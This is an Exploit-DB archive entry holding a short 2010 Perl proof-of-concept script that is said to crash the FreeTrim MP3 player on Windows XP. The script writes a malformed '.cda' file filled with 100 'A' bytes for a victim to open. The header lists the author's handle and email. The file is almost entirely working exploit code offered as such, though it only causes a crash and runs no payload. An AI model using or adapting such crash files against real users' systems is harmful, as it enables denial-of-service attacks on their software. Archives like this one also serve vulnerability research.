exploit-db-mirror/exploits/windows/dos/15657.txt
Offensive Security b4c96a5864 DB: 2021-09-03
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

18 lines
No EOL
506 B
Text

####Exploit Title: FreeTrim MP3 Local Crash PoC
####Software Link: http://www.freetrimmp3.com/downloads/FreeTrimMP3.exe
####Tested on: Win XP SP3
####Date: 02-12-2010
####Author: h1ch4m
####Email: h1ch4m@live.fr
################################################
############# sahra dyalna o jazayrya khotna
################################################
my $file= "1.cda";
my $junk = "\x41" x 100;
open($FILE,">$file");
print $FILE $junk;
close($FILE);
print "File Created successfully\n";
sleep(1);